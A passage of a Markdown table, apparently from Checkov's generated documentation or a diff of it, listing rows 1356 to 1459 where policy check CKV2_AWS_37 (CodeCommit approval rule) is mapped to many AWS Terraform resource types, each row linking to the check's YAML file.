[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1356 | CKV2_AWS_37 | resource | aws_service_discovery_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1357 | CKV2_AWS_37 | resource | aws_servicecatalog_portfolio | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1358 | CKV2_AWS_37 | resource | aws_servicequotas_service_quota | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1359 | CKV2_AWS_37 | resource | aws_ses_active_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1360 | CKV2_AWS_37 | resource | aws_ses_configuration_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1361 | CKV2_AWS_37 | resource | aws_ses_domain_dkim | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1362 | CKV2_AWS_37 | resource | 
aws_ses_domain_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1363 | CKV2_AWS_37 | resource | aws_ses_domain_identity_verification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1364 | CKV2_AWS_37 | resource | aws_ses_domain_mail_from | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1365 | CKV2_AWS_37 | resource | aws_ses_email_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1366 | CKV2_AWS_37 | resource | aws_ses_event_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1367 | CKV2_AWS_37 | resource | aws_ses_identity_notification_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1368 | CKV2_AWS_37 | resource | aws_ses_identity_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1369 | CKV2_AWS_37 | resource | aws_ses_receipt_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1370 | CKV2_AWS_37 | resource | aws_ses_receipt_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1371 | CKV2_AWS_37 | resource | aws_ses_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1372 | CKV2_AWS_37 | resource | aws_ses_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1373 | CKV2_AWS_37 | resource | aws_sfn_activity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1374 | CKV2_AWS_37 | resource | aws_sfn_state_machine | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1375 | CKV2_AWS_37 | resource | aws_shield_protection | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1376 | CKV2_AWS_37 | resource | aws_simpledb_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1377 | CKV2_AWS_37 | resource | aws_snapshot_create_volume_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1378 | CKV2_AWS_37 | resource | aws_sns_platform_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1379 | CKV2_AWS_37 | resource | aws_sns_sms_preferences | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1380 | CKV2_AWS_37 | resource | aws_sns_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1381 | CKV2_AWS_37 | resource | aws_sns_topic_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1382 | CKV2_AWS_37 | resource | 
aws_sns_topic_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1383 | CKV2_AWS_37 | resource | aws_spot_datafeed_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1384 | CKV2_AWS_37 | resource | aws_spot_fleet_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1385 | CKV2_AWS_37 | resource | aws_spot_instance_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1386 | CKV2_AWS_37 | resource | aws_sqs_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1387 | CKV2_AWS_37 | resource | aws_sqs_queue_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1388 | CKV2_AWS_37 | resource | aws_ssm_activation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) 
| +| 1389 | CKV2_AWS_37 | resource | aws_ssm_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1390 | CKV2_AWS_37 | resource | aws_ssm_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1391 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1392 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1393 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1394 | CKV2_AWS_37 | resource | aws_ssm_parameter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1395 | CKV2_AWS_37 | resource | aws_ssm_patch_baseline | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1396 | CKV2_AWS_37 | resource | aws_ssm_patch_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1397 | CKV2_AWS_37 | resource | aws_ssm_resource_data_sync | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1398 | CKV2_AWS_37 | resource | aws_storagegateway_cache | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1399 | CKV2_AWS_37 | resource | aws_storagegateway_cached_iscsi_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1400 | CKV2_AWS_37 | resource | aws_storagegateway_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1401 | CKV2_AWS_37 | resource | aws_storagegateway_nfs_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1402 | CKV2_AWS_37 | resource | 
aws_storagegateway_smb_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1403 | CKV2_AWS_37 | resource | aws_storagegateway_upload_buffer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1404 | CKV2_AWS_37 | resource | aws_storagegateway_working_storage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1405 | CKV2_AWS_37 | resource | aws_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1406 | CKV2_AWS_37 | resource | aws_swf_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1407 | CKV2_AWS_37 | resource | aws_transfer_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1408 | CKV2_AWS_37 | resource | aws_transfer_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1409 | CKV2_AWS_37 | resource | aws_transfer_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1410 | CKV2_AWS_37 | resource | aws_volume_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1411 | CKV2_AWS_37 | resource | aws_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1412 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1413 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1414 | CKV2_AWS_37 | resource | aws_vpc_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1415 | CKV2_AWS_37 | resource | aws_vpc_endpoint_connection_notification | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1416 | CKV2_AWS_37 | resource | aws_vpc_endpoint_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1417 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1418 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service_allowed_principal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1419 | CKV2_AWS_37 | resource | aws_vpc_endpoint_subnet_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1420 | CKV2_AWS_37 | resource | aws_vpc_ipv4_cidr_block_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1421 | CKV2_AWS_37 | resource | aws_vpc_peering_connection | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1422 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1423 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1424 | CKV2_AWS_37 | resource | aws_vpn_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1425 | CKV2_AWS_37 | resource | aws_vpn_connection_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1426 | CKV2_AWS_37 | resource | aws_vpn_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1427 | CKV2_AWS_37 | resource | aws_vpn_gateway_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1428 | CKV2_AWS_37 | resource | 
aws_vpn_gateway_route_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1429 | CKV2_AWS_37 | resource | aws_waf_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1430 | CKV2_AWS_37 | resource | aws_waf_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1431 | CKV2_AWS_37 | resource | aws_waf_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1432 | CKV2_AWS_37 | resource | aws_waf_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1433 | CKV2_AWS_37 | resource | aws_waf_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1434 | CKV2_AWS_37 | resource | aws_waf_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1435 | CKV2_AWS_37 | resource | aws_waf_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1436 | CKV2_AWS_37 | resource | aws_waf_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1437 | CKV2_AWS_37 | resource | aws_waf_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1438 | CKV2_AWS_37 | resource | aws_waf_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1439 | CKV2_AWS_37 | resource | aws_waf_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1440 | CKV2_AWS_37 | resource | aws_waf_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1441 | CKV2_AWS_37 | resource | aws_wafregional_byte_match_set | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1442 | CKV2_AWS_37 | resource | aws_wafregional_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1443 | CKV2_AWS_37 | resource | aws_wafregional_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1444 | CKV2_AWS_37 | resource | aws_wafregional_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1445 | CKV2_AWS_37 | resource | aws_wafregional_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1446 | CKV2_AWS_37 | resource | aws_wafregional_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1447 | CKV2_AWS_37 | resource | aws_wafregional_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1448 
| CKV2_AWS_37 | resource | aws_wafregional_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1449 | CKV2_AWS_37 | resource | aws_wafregional_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1450 | CKV2_AWS_37 | resource | aws_wafregional_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1451 | CKV2_AWS_37 | resource | aws_wafregional_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1452 | CKV2_AWS_37 | resource | aws_wafregional_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1453 | CKV2_AWS_37 | resource | aws_wafregional_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1454 | CKV2_AWS_37 | resource | aws_wafv2_ip_set | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1455 | CKV2_AWS_37 | resource | aws_wafv2_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1456 | CKV2_AWS_37 | resource | aws_wafv2_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1457 | CKV2_AWS_37 | resource | aws_wafv2_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1458 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1459 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_logging_configuration | Ensure CodeCommit associates an approval rule | Terraform | 